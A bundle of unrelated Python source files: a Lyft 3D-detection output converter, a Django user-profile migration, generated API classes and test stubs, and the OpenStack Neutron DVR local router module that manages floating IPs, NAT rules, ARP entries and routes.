print('Converting the json to csv...')
for token in results.keys():
cnt += 1
predictions = results[token]
prediction_str = ''
for i in range(len(predictions)):
prediction_str += \
str(predictions[i]['score']) + ' ' + \
str(predictions[i]['translation'][0]) + ' ' + \
str(predictions[i]['translation'][1]) + ' ' + \
str(predictions[i]['translation'][2]) + ' ' + \
str(predictions[i]['size'][0]) + ' ' + \
str(predictions[i]['size'][1]) + ' ' + \
str(predictions[i]['size'][2]) + ' ' + \
str(Quaternion(list(predictions[i]['rotation']))
.yaw_pitch_roll[0]) + ' ' + \
predictions[i]['name'] + ' '
prediction_str = prediction_str[:-1]
idx = Id_list.index(token)
pred_list[idx] = prediction_str
df = pd.DataFrame({'Id': Id_list, 'PredictionString': pred_list})
mmcv.mkdir_or_exist(os.path.dirname(csv_savepath))
df.to_csv(csv_savepath, index=False)
def output_to_lyft_box(detection):
"""Convert the output to the box class in the Lyft.
Args:
detection (dict): Detection results.
Returns:
list[:obj:`LyftBox`]: List of standard LyftBoxes.
"""
box3d = detection['boxes_3d']
scores = detection['scores_3d'].numpy()
labels = detection['labels_3d'].numpy()
box_gravity_center = box3d.gravity_center.numpy()
box_dims = box3d.dims.numpy()
box_yaw = box3d.yaw.numpy()
# our LiDAR coordinate system -> Lyft box coordinate system
lyft_box_dims = box_dims[:, [1, 0, 2]]
box_list = []
for i in range(len(box3d)):
quat = Quaternion(axis=[0, 0, 1], radians=box_yaw[i])
box = LyftBox(
box_gravity_center[i],
lyft_box_dims[i],
quat,
label=labels[i],
score=scores[i])
box_list.append(box)
return box_list
def lidar_lyft_box_to_global(info, boxes):
"""Convert the box from ego to global coordinate.
Args:
info (dict): Info for a specific sample data, including the
calibration information.
boxes (list[:obj:`LyftBox`]): List of predicted LyftBoxes.
Returns:
list: List of standard LyftBoxes in the global
coordinate.
"""
box_list = []
for box in boxes:
# Move box to ego vehicle coord system
box.rotate(Quaternion(info['lidar2ego_rotation']))
box.translate(np.array(info['lidar2ego_translation']))
# Move box to global coord system
box.rotate(Quaternion(info['ego2global_rotation']))
box.translate(np.array(info['ego2global_translation']))
box_list.append(box)
return box_list
|
# Generated by Django 3.2.7 on 2021-09-08 13:54
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
|
##
##
# File auto-generated against equivalent DynamicSerialize Java class
class StatusResponse(object):
def __init__(self):
self.hostname = None
self.jvmName = None
self.statistics = None
def getHostname(self):
return self.hostname
def setHostname(self, hostname):
self.hostname = hostname
def getJvmName(self):
return self.jvmName
def setJvmName(self, jvmName):
self.jvmName = jvmName
def getStatistics(self):
return self.statistics
def setStatistics(self, statistics):
self.statistics = statistics
def __repr__(self):
return self.hostname + ':' + self.jvmName
|
# coding: utf-8
"""
IdCheck.IO API
Check identity documents
OpenAPI spec version: 0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import idcheckio_python_client
from idcheckio_python_client.rest import ApiException
from idcheckio_python_client.models.task_response import TaskResponse
class TestTaskResponse(unittest.TestCase):
""" TaskResponse unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testTaskResponse(self):
"""
Test TaskResponse
"""
model = idcheckio_python_client.models.task_response.TaskResponse()
if __name__ == '__main__':
unittest.main()
|
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import binascii
import collections
import netaddr
from neutron_lib import constants as lib_constants
from neutron_lib import exceptions
from oslo_log import log as logging
from oslo_utils import excutils
import six
from neutron.agent.l3 import dvr_fip_ns
from neutron.agent.l3 import dvr_router_base
from neutron.agent.linux import ip_lib
from neutron.common import constants as n_const
from neutron.common import utils as common_utils
LOG = logging.getLogger(__name__)
# xor-folding mask used for IPv6 rule index
MASK_30 = 0x3fffffff
# Tracks the arp entry cache
Arp_entry = collections.namedtuple(
'Arp_entry', 'ip mac subnet_id operation')
class DvrLocalRouter(dvr_router_base.DvrRouterBase):
def __init__(self, host, *args, **kwargs):
super(DvrLocalRouter, self).__init__(host, *args, **kwargs)
self.floating_ips_dict = {}
self.centralized_floatingips_set = set()
# Linklocal subnet for router and floating IP namespace link
self.rtr_fip_subnet = None
self.rtr_fip_connect = False
self.fip_ns = None
self._pending_arp_set = set()
def get_centralized_router_cidrs(self):
return self.centralized_floatingips_set
def migrate_centralized_floating_ip(self, fip, interface_name, device):
# Remove the centralized fip first and then add fip to the host
ip_cidr = common_utils.ip_to_cidr(fip['floating_ip_address'])
self.floating_ip_removed_dist(ip_cidr)
# Now add the floating_ip to the current host
self.floating_ip_added_dist(fip, ip_cidr)
def floating_forward_rules(self, fip):
"""Override this function defined in router_info for dvr routers."""
if not self.fip_ns:
return []
if fip.get(lib_constants.DVR_SNAT_BOUND):
return []
fixed_ip = fip['fixed_ip_address']
floating_ip = fip['floating_ip_address']
rtr_2_fip_name = self.fip_ns.get_rtr_ext_device_name(self.router_id)
dnat_from_floatingip_to_fixedip = (
'PREROUTING', '-d %s/32 -i %s -j DNAT --to-destination %s' % (
floating_ip, rtr_2_fip_name, fixed_ip))
snat_from_fixedip_to_floatingip = (
'float-snat', '-s %s/32 -j SNAT --to-source %s' % (
fixed_ip, floating_ip))
return [dnat_from_floatingip_to_fixedip,
snat_from_fixedip_to_floatingip]
def floating_mangle_rules(self, floating_ip, fixed_ip, internal_mark):
if not self.fip_ns:
return []
rtr_2_fip_name = self.fip_ns.get_rtr_ext_device_name(self.router_id)
mark_traffic_to_floating_ip = (
'floatingip', '-d %s/32 -i %s -j MARK --set-xmark %s' % (
floating_ip, rtr_2_fip_name, internal_mark))
mark_traffic_from_fixed_ip = (
'FORWARD', '-s %s/32 -j $float-snat' % fixed_ip)
return [mark_traffic_to_floating_ip, mark_traffic_from_fixed_ip]
def add_centralized_floatingip(self, fip, fip_cidr):
"""Implements floatingip in centralized network node.
This is a dummy function and is overridden in dvr_edge_router.py
to add the floatingip function to the snat namespace.
"""
def remove_centralized_floatingip(self, fip_cidr):
"""Removes floatingip from centralized network node.
This is a dummy function and is overridden in dvr_edge_router.py
to remove the floatingip function from the snat namespace.
"""
def floating_ip_added_dist(self, fip, fip_cidr):
"""Add floating IP to respective namespace based on agent mode."""
if fip.get(lib_constants.DVR_SNAT_BOUND):
floating_ip_status = self.add_centralized_floatingip(fip, fip_cidr)
if floating_ip_status == lib_constants.FLOATINGIP_STATUS_ACTIVE:
self.centralized_floatingips_set.add(fip_cidr)
return floating_ip_status
if not self._check_if_floatingip_bound_to_host(fip):
# TODO(Swami): Need to figure out what status
# should be returned when the floating IP is
# not destined for this agent and if the floating
# IP is configured in a different compute host.
# This should not happen once we fix the server
# side code, but still a check to make sure if
# the floating IP is intended for this host should
# be done.
return
floating_ip = fip['floating_ip_address']
fixed_ip = fip['fixed_ip_address']
self._add_floating_ip_rule(floating_ip, fixed_ip)
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
#Add routing rule in fip namespace
fip_ns_name = self.fip_ns.get_name()
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, __ = self.rtr_fip_subnet.get_pair()
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
device.route.add_route(fip_cidr, str(rtr_2_fip.ip))
interface_name = (
self.fip_ns.get_ext_device_name(
self.fip_ns.agent_gateway_port['id']))
ip_lib.send_ip_addr_adv_notif(fip_ns_name,
interface_name,
floating_ip)
return lib_constants.FLOATINGIP_STATUS_ACTIVE
def _add_floating_ip_rule(self, floating_ip, fixed_ip):
rule_pr = self.fip_ns.allocate_rule_priority(floating_ip)
self.floating_ips_dict[floating_ip] = rule_pr
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
ip_rule.rule.add(ip=fixed_ip,
table=dvr_fip_ns.FIP_RT_TBL,
priority=rule_pr)
def _remove_floating_ip_rule(self, floating_ip):
if floating_ip in self.floating_ips_dict:
rule_pr = self.floating_ips_dict[floating_ip]
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
ip_rule.rule.delete(ip=floating_ip,
table=dvr_fip_ns.FIP_RT_TBL,
priority=rule_pr)
self.fip_ns.deallocate_rule_priority(floating_ip)
#TODO(rajeev): Handle else case - exception/log?
def floating_ip_removed_dist(self, fip_cidr):
"""Remove floating IP from FIP namespace."""
if fip_cidr in self.centralized_floatingips_set:
self.remove_centralized_floatingip(fip_cidr)
self.centralized_floatingips_set.remove(fip_cidr)
return
floating_ip = fip_cidr.split('/')[0]
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.lookup(
self.router_id)
if self.rtr_fip_subnet:
rtr_2_fip, fip_2_rtr = self.rtr_fip_subnet.get_pair()
fip_ns_name = self.fip_ns.get_name()
self._remove_floating_ip_rule(floating_ip)
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
device.route.delete_route(fip_cidr, str(rtr_2_fip.ip))
def floating_ip_moved_dist(self, fip):
"""Handle floating IP move between fixed IPs."""
floating_ip = fip['floating_ip_address']
self._remove_floating_ip_rule(floating_ip)
self._add_floating_ip_rule(floating_ip, fip['fixed_ip_address'])
def add_floating_ip(self, fip, interface_name, device):
# Special Handling for DVR - update FIP namespace
ip_cidr = common_utils.ip_to_cidr(fip['floating_ip_address'])
return self.floating_ip_added_dist(fip, ip_cidr)
def remove_floating_ip(self, device, ip_cidr):
self.floating_ip_removed_dist(ip_cidr)
def move_floating_ip(self, fip):
self.floating_ip_moved_dist(fip)
return lib_constants.FLOATINGIP_STATUS_ACTIVE
def _get_internal_port(self, subnet_id):
"""Return internal router port based on subnet_id."""
router_ports = self.router.get(lib_constants.INTERFACE_KEY, [])
for port in router_ports:
fips = port['fixed_ips']
for f in fips:
if f['subnet_id'] == subnet_id:
return port
def _cache_arp_entry(self, ip, mac, subnet_id, operation):
"""Cache the arp entries if device not ready."""
arp_entry_tuple = Arp_entry(ip=ip,
mac=mac,
subnet_id=subnet_id,
operation=operation)
self._pending_arp_set.add(arp_entry_tuple)
def _process_arp_cache_for_internal_port(self, subnet_id):
"""Function to process the cached arp entries."""
arp_remove = set()
for arp_entry in self._pending_arp_set:
if subnet_id == arp_entry.subnet_id:
try:
state = self._update_arp_entry(
arp_entry.ip, arp_entry.mac,
arp_entry.subnet_id, arp_entry.operation)
except Exception:
state = False
if state:
# If the arp update was successful, then
# go ahead and add it to the remove set
arp_remove.add(arp_entry)
self._pending_arp_set -= arp_remove
def _delete_arp_cache_for_internal_port(self, subnet_id):
"""Function to delete the cached arp entries."""
arp_delete = set()
for arp_entry in self._pending_arp_set:
if subnet_id == arp_entry.subnet_id:
arp_delete.add(arp_entry)
self._pending_arp_set -= arp_delete
def _update_arp_entry(
self, ip, mac, subnet_id, operation, nud_state='permanent'):
"""Add or delete arp entry into router namespace for the subnet."""
port = self._get_internal_port(subnet_id)
# update arp entry only if the subnet is attached to the router
if not port:
return False
try:
# TODO(mrsmith): optimize the calls below for bulk calls
interface_name = self.get_internal_device_name(port['id'])
device = ip_lib.IPDevice(interface_name, namespace=self.ns_name)
if device.exists():
if operation == 'add':
device.neigh.add(ip, mac, nud_state=nud_state)
elif operation == 'delete':
device.neigh.delete(ip, mac)
return True
else:
if operation == 'add':
LOG.warning("Device %s does not exist so ARP entry "
"cannot be updated, will cache "
"information to be applied later "
"when the device exists",
device)
self._cache_arp_entry(ip, mac, subnet_id, operation)
return False
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception("DVR: Failed updating arp entry")
def _set_subnet_arp_info(self, subnet_id):
"""Set ARP info retrieved from Plugin for existing ports."""
# TODO(Carl) Can we eliminate the need to make this RPC while
# processing a router.
subnet_ports = self.agent.get_ports_by_subnet(subnet_id)
ignored_device_owners = (
lib_constants.ROUTER_INTERFACE_OWNERS +
tuple(common_utils.get_dvr_allowed_address_pair_device_owners()))
for p in subnet_ports:
nud_state = 'permanent' if p.get('device_owner') else 'reachable'
if p['device_owner'] not in ignored_device_owners:
for fixed_ip in p['fixed_ips']:
self._update_arp_entry(fixed_ip['ip_address'],
p['mac_address'],
subnet_id,
'add',
nud_state=nud_state)
self._process_arp_cache_for_internal_port(subnet_id)
@staticmethod
def _get_snat_idx(ip_cidr):
"""Generate index for DVR snat rules and route tables.
The index value has to be 32 bits or less but more than the system
generated entries i.e. 32768. For IPv4 use the numeric value of the
cidr. For IPv6 generate a crc32 bit hash and xor-fold to 30 bits.
Use the freed range to extend smaller values so that they become
greater than system generated entries.
"""
net = netaddr.IPNetwork(ip_cidr)
if net.version == 6:
if isinstance(ip_cidr, six.text_type):
ip_cidr = ip_cidr.encode() # Needed for Python 3.x
# the crc32 & 0xffffffff is for Python 2.6 and 3.0 compatibility
snat_idx = binascii.crc32(ip_cidr) & 0xffffffff
# xor-fold the hash to reserve upper range to extend smaller values
snat_idx = (snat_idx >> 30) ^ (snat_idx & MASK_30)
if snat_idx < 32768:
snat_idx = snat_idx + MASK_30
else:
snat_idx = net.value
return snat_idx
def _delete_gateway_device_if_exists(self, ns_ip_device, gw_ip_addr,
snat_idx):
try:
ns_ip_device.route.delete_gateway(gw_ip_addr,
table=snat_idx)
except exceptions.DeviceNotFoundError:
pass
def _stale_ip_rule_cleanup(self, ns_ipr, ns_ipd, ip_version):
ip_rules_list = ns_ipr.rule.list_rules(ip_version)
snat_table_list = []
for ip_rule in ip_rules_list:
snat_table = ip_rule['table']
priority = ip_rule['priority']
if snat_table in ['local', 'default', 'main']:
continue
if (ip_version == lib_constants.IP_VERSION_4 and
snat_table in range(dvr_fip_ns.FIP_PR_START,
dvr_fip_ns.FIP_PR_END)):
continue
gateway_cidr = ip_rule['from']
ns_ipr.rule.delete(ip=gateway_cidr,
table=snat_table,
priority=priority)
snat_table_list.append(snat_table)
for tb in snat_table_list:
ns_ipd.route.flush(ip_version, table=tb)
def gateway_redirect_cleanup(self, rtr_interface):
ns_ipr = ip_lib.IPRule(namespace=self.ns_name)
ns_ipd = ip_lib.IPDevice(rtr_interface, namespace=self.ns_name)
self._stale_ip_rule_cleanup(ns_ipr, ns_ipd, lib_constants.IP_VERSION_4)
self._stale_ip_rule_cleanup(ns_ipr, ns_ipd, lib_constants.IP_VERSION_6)
def _snat_redirect_modify(self, gateway, sn_port, sn_int, is_add):
"""Adds or removes rules and routes for SNAT redirection."""
cmd = ['net.ipv4.conf.%s.send_redirects=0' % sn_int]
try:
ns_ipr = ip_lib.IPRule(namespace=self.ns_name)
ns_ipd = ip_lib.IPDevice(sn_int, namespace=self.ns_name)
for port_fixed_ip in sn_port['fixed_ips']:
# Iterate and find the gateway IP address matching
# the IP version
port_ip_addr = port_fixed_ip['ip_address']
port_ip_vers = netaddr.IPAddress(port_ip_addr).version
for gw_fixed_ip in gateway['fixed_ips']:
gw_ip_addr = gw_fixed_ip['ip_address']
if netaddr.IPAddress(gw_ip_addr).version == port_ip_vers:
sn_port_cidr = common_utils.ip_to_cidr(
port_ip_addr, port_fixed_ip['prefixlen'])
snat_idx = self._get_snat_idx(sn_port_cidr)
if is_add:
ns_ipd.route.add_gateway(gw_ip_addr,
table=snat_idx)
ns_ipr.rule.add(ip=sn_port_cidr,
table=snat_idx,
priority=snat_idx)
ip_lib.sysctl(cmd, namespace=self.ns_name)
else:
self._delete_gateway_device_if_exists(ns_ipd,
gw_ip_addr,
snat_idx)
ns_ipr.rule.delete(ip=sn_port_cidr,
table=snat_idx,
priority=snat_idx)
except Exception:
if is_add:
exc = 'DVR: error adding redirection logic'
else:
exc = ('DVR: snat remove failed to clear the rule '
'and device')
LOG.exception(exc)
def _snat_redirect_add(self, gateway, sn_port, sn_int):
"""Adds rules and routes for SNAT redirection."""
self._snat_redirect_modify(gateway, sn_port, sn_int, is_add=True)
def _snat_redirect_remove(self, gateway, sn_port, sn_int):
"""Removes rules and routes for SNAT redirection."""
self._snat_redirect_modify(gateway, sn_port, sn_int, is_add=False)
def internal_network_added(self, port):
super(DvrLocalRouter, self).internal_network_added(port)
# NOTE: The following function _set_subnet_arp_info
# should be called to dynamically populate the arp
# entries for the dvr services ports into the router
# namespace. This does not have dependency on the
# external_gateway port or the agent_mode.
ex_gw_port = self.get_ex_gw_port()
for subnet in port['subnets']:
self._set_subnet_arp_info(subnet['id'])
if ex_gw_port:
# Check for address_scopes here if gateway exists.
if self._check_if_address_scopes_match(port, ex_gw_port):
self._add_interface_routing_rule_to_router_ns(port)
self._add_interface_route_to_fip_ns(port)
self._snat_redirect_add_from_port(port)
def _snat_redirect_add_from_port(self, port):
ex_gw_port = self.get_ex_gw_port()
if not ex_gw_port:
return
if self._check_if_address_scopes_match(port, ex_gw_port):
# If address scopes match there is no need to cleanup the
# snat redirect rules, hence return here.
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
interface_name = self.get_internal_device_name(port['id'])
self._snat_redirect_add(sn_port, port, interface_name)
def _dvr_internal_network_removed(self, port):
# Clean up the cached arp entries related to the port subnet
for subnet in port['subnets']:
self._delete_arp_cache_for_internal_port(subnet)
if not self.ex_gw_port:
return
# Delete DVR address_scope static route for the removed interface
# Check for address_scopes here.
if self._check_if_address_scopes_match(port, self.ex_gw_port):
self._delete_interface_route_in_fip_ns(port)
self._delete_interface_routing_rule_in_router_ns(port)
# If address scopes match there is no need to cleanup the
# snat redirect rules, hence return here.
return
sn_port = self.get_snat_port_for_internal_port(port, self.snat_ports)
if not sn_port:
return
# DVR handling code for SNAT
interface_name = self.get_internal_device_name(port['id'])
self._snat_redirect_remove(sn_port, port, interface_name)
def internal_network_removed(self, port):
self._dvr_internal_network_removed(port)
super(DvrLocalRouter, self).internal_network_removed(port)
def get_floating_agent_gw_interface(self, ext_net_id):
"""Filter Floating Agent GW port for the external network."""
fip_ports = self.router.get(n_const.FLOATINGIP_AGENT_INTF_KEY, [])
return next(
(p for p in fip_ports if p['network_id'] == ext_net_id), None)
def get_snat_external_device_interface_name(self, port_id):
pass
def get_external_device_interface_name(self, ex_gw_port):
fip_int = self.fip_ns.get_int_device_name(self.router_id)
if ip_lib.device_exists(fip_int, namespace=self.fip_ns.get_name()):
return self.fip_ns.get_rtr_ext_device_name(self.router_id)
def enable_snat_redirect_rules(self, ex_gw_port):
for p in self.internal_ports:
if not self._check_if_address_scopes_match(p, ex_gw_port):
gateway = self.get_snat_port_for_internal_port(p)
if not gateway:
continue
internal_dev = self.get_internal_device_name(p['id'])
self._snat_redirect_add(gateway, p, internal_dev)
def disable_snat_redirect_rules(self, ex_gw_port):
for p in self.internal_ports:
if not self._check_if_address_scopes_match(p, ex_gw_port):
gateway = self.get_snat_port_for_internal_port(
p, self.snat_ports)
if not gateway:
continue
internal_dev = self.get_internal_device_name(p['id'])
self._snat_redirect_remove(gateway, p, internal_dev)
def external_gateway_added(self, ex_gw_port, interface_name):
# TODO(Carl) Refactor external_gateway_added/updated/removed to use
# super class implementation where possible. Looks like preserve_ips,
# and ns_name are the key differences.
cmd = ['net.ipv4.conf.all.send_redirects=0']
ip_lib.sysctl(cmd, namespace=self.ns_name)
self.enable_snat_redirect_rules(ex_gw_port)
for port in self.get_snat_interfaces():
for ip in port['fixed_ips']:
self._update_arp_entry(ip['ip_address'],
port['mac_address'],
ip['subnet_id'],
'add')
def external_gateway_updated(self, ex_gw_port, interface_name):
pass
def external_gateway_removed(self, ex_gw_port, interface_name):
# TODO(Carl) Should this be calling process_snat_dnat_for_fip?
self.process_floating_ip_nat_rules()
if self.fip_ns:
to_fip_interface_name = (
self.get_external_device_interface_name(ex_gw_port))
self.process_floating_ip_addresses(to_fip_interface_name)
# Remove the router to fip namespace connection after the
# gateway is removed.
self.fip_ns.delete_rtr_2_fip_link(self)
self.rtr_fip_connect = False
# NOTE:_snat_redirect_remove should be only called when the
# gateway is cleared and should not be called when the gateway
# is moved or rescheduled.
if not self.router.get('gw_port'):
self.disable_snat_redirect_rules(ex_gw_port)
def _handle_router_snat_rules(self, ex_gw_port, interface_name):
"""Configures NAT rules for Floating IPs for DVR."""
self.iptables_manager.ipv4['nat'].empty_chain('POSTROUTING')
self.iptables_manager.ipv4['nat'].empty_chain('snat')
ex_gw_port = self.get_ex_gw_port()
if not ex_gw_port:
return
ext_device_name = self.get_external_device_interface_name(ex_gw_port)
floatingips = self.get_floating_ips()
if not ext_device_name or not floatingips:
# Without router to fip device, or without any floating ip,
# the snat rules should not be added
return
# Add back the jump to float-snat
self.iptables_manager.ipv4['nat'].add_rule('snat', '-j $float-snat')
rule = self._prevent_snat_for_internal_traffic_rule(ext_device_name)
self.iptables_manager.ipv4['nat'].add_rule(*rule)
def _get_address_scope_mark(self):
# Prepare address scope iptables rule for internal ports
internal_ports = self.router.get(lib_constants.INTERFACE_KEY, [])
ports_scopemark = self._get_port_devicename_scopemark(
internal_ports, self.get_internal_device_name)
# DVR local router will use rfp port as external port
ext_port = self.get_ex_gw_port()
if not ext_port:
return ports_scopemark
ext_device_name = self.get_external_device_interface_name(ext_port)
if not ext_device_name:
return ports_scopemark
ext_scope = self._get_external_address_scope()
ext_scope_mark = self.get_address_scope_mark_mask(ext_scope)
ports_scopemark[lib_constants.IP_VERSION_4][ext_device_name] = (
ext_scope_mark)
return ports_scopemark
def _check_if_floatingip_bound_to_host(self, fip):
"""Check if the floating IP is bound to this host."""
return self.host in (fip.get('host'), fip.get('dest_host'))
def process_external(self):
if self.agent_conf.agent_mode != (
lib_constants.L3_AGENT_MODE_DVR_NO_EXTERNAL):
ex_gw_port = self.get_ex_gw_port()
if ex_gw_port:
self.create_dvr_external_gateway_on_agent(ex_gw_port)
self.connect_rtr_2_fip()
super(DvrLocalRouter, self).process_external()
def connect_rtr_2_fip(self):
if self.fip_ns.agent_gateway_port and not self.rtr_fip_connect:
ex_gw_port = self.get_ex_gw_port()
self.fip_ns.create_rtr_2_fip_link(self)
self.set_address_scope_interface_routes(ex_gw_port)
self.rtr_fip_connect = True
self.routes_updated([], self.router['routes'])
def _check_if_address_scopes_match(self, int_port, ex_gw_port):
"""Checks and returns the matching state for v4 or v6 scopes."""
int_port_addr_scopes = int_port.get('address_scopes', {})
ext_port_addr_scopes = ex_gw_port.get('address_scopes', {})
key = (
lib_constants.IP_VERSION_6 if self._port_has_ipv6_subnet(int_port)
else lib_constants.IP_VERSION_4)
# NOTE: DVR does not support IPv6 for the floating namespace yet, so
# until we fix it, we probably should use the snat redirect path for
# the ports that have IPv6 address configured.
int_port_addr_value = int_port_addr_scopes.get(str(key))
# If the address scope of the interface is none, then don't need
# to compare and just return.
if int_port_addr_value is None:
return False
if ((key != lib_constants.IP_VERSION_6) and
int_port_addr_scopes.get(str(key)) in
ext_port_addr_scopes.values()):
return True
return False
def _delete_interface_route_in_fip_ns(self, router_port):
rtr_2_fip_ip, fip_2_rtr_name = self.get_rtr_fip_ip_and_interface_name()
fip_ns_name = self.fip_ns.get_name()
if ip_lib.network_namespace_exists(fip_ns_name):
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
if not device.exists():
return
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
device.route.delete_route(rtr_port_cidr, str(rtr_2_fip_ip))
def _add_interface_route_to_fip_ns(self, router_port):
rtr_2_fip_ip, fip_2_rtr_name = self.get_rtr_fip_ip_and_interface_name()
fip_ns_name = self.fip_ns.get_name()
if ip_lib.network_namespace_exists(fip_ns_name):
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
if not device.exists():
return
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
device.route.add_route(rtr_port_cidr, str(rtr_2_fip_ip))
def _add_interface_routing_rule_to_router_ns(self, router_port):
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
ip_rule.rule.add(ip=rtr_port_cidr,
table=dvr_fip_ns.FIP_RT_TBL,
priority=dvr_fip_ns.FAST_PATH_EXIT_PR)
def _delete_interface_routing_rule_in_router_ns(self, router_port):
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
ip_rule.rule.delete(ip=rtr_port_cidr,
table=dvr_fip_ns.FIP_RT_TBL,
priority=dvr_fip_ns.FAST_PATH_EXIT_PR)
def get_rtr_fip_ip_and_interface_name(self):
"""Function that returns the router to fip interface name and ip."""
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, __ = self.rtr_fip_subnet.get_pair()
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
return rtr_2_fip.ip, fip_2_rtr_name
def set_address_scope_interface_routes(self, ex_gw_port):
"""Sets routing rules for router interfaces if addr scopes match."""
for port in self.internal_ports:
if self._check_if_address_scopes_match(port, ex_gw_port):
self._add_interface_routing_rule_to_router_ns(port)
self._add_interface_route_to_fip_ns(port)
def create_dvr_external_gateway_on_agent(self, ex_gw_port):
fip_agent_port = self.get_floating_agent_gw_interface(
ex_gw_port['network_id'])
if not fip_agent_port:
fip_agent_port = self.agent.plugin_rpc.get_agent_gateway_port(
self.agent.context, ex_gw_port['network_id'])
LOG.debug("FloatingIP agent gateway port received from the "
"plugin: %s", fip_agent_port)
self.fip_ns.create_or_update_gateway_port(fip_agent_port)
def update_routing_table(self, operation, route):
# TODO(Swami): The static routes should be added to the
# specific namespace based on the availability of the
# network interfaces. In the case of DVR the static routes
# for local internal router networks can be added to the
# snat_namespace and router_namespace but should not be
# added to the fip namespace. Likewise the static routes
# for the external router networks should only be added to
# the snat_namespace and fip_namespace.
# The current code adds static routes to all namespaces in
# order to reduce the complexity. This should be revisited
# later.
if self.fip_ns and self.fip_ns.agent_gateway_port:
fip_ns_name = self.fip_ns.get_name()
agent_gw_port = self.fip_ns.agent_gateway_port
route_apply = self._check_if_route_applicable_to_fip_namespace(
route, agent_gw_port)
if route_apply:
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, fip_2_rtr = self.rtr_fip_subnet.get_pair()
tbl_index = self._get_snat_idx(fip_2_rtr)
self._update_fip_route_table_with_next_hop_routes(
operation, route, fip_ns_name, tbl_index)
super(DvrLocalRouter, self).update_routing_table(operation, route)
def _update_fip_route_table_with_next_hop_routes(
self, operation, route, fip_ns_name, tbl_index):
cmd = ['ip', 'route', operation, 'to', route['destination'],
'via', route['nexthop'], 'table', tbl_index]
ip_wrapper = ip_lib.IPWrapper(namespace=fip_ns_name)
if ip_wrapper.netns.exists(fip_ns_name):
ip_wrapper.netns.execute(cmd, check_exit_code=False)
else:
LOG.debug("The FIP namespace %(ns)s does not exist for "
"router %(id)s",
{'ns': fip_ns_name, 'id': self.router_id})
def _check_if_route_applicable_to_fip_namespace(
self, route, agent_gateway_port):
ip_cidrs = common_utils.fixed_ip_cidrs(agent_gateway_port['fixed_ips'])
nexthop_cidr = netaddr.IPAddress(route['nexthop'])
for gw_cidr in ip_cidrs:
gw_subnet_cidr = netaddr.IPNetwork(gw_cidr)
# NOTE: In the case of DVR routers apply the extra routes
# on the FIP namespace only if it is associated with the
# external agent gateway subnets.
if nexthop_cidr in gw_subnet_cidr:
return True
return False
def get_router_cidrs(self, device):
"""As no floatingip will be set on the rfp device. Get floatingip from
the route of fip namespace.
"""
if not self.fip_ns:
return set()
fip_ns_name = self.fip_ns.get_name()
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
if not device.exists():
return set()
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, _fip_2_rtr = self.rtr_fip_subnet.get_pair()
exist_routes = device.route.list_routes(
lib_constants.IP_VERSION_4, via=str(rtr_2_fip.ip))
return {common_utils.ip_to_cidr(route['cidr'])
for route in exist_routes}
def process(self):
ex_gw_port = self.get_ex_gw_port()
if ex_gw_port:
self.fip_ns = self.agent.get_fip_ns(ex_gw_port['network_id'])
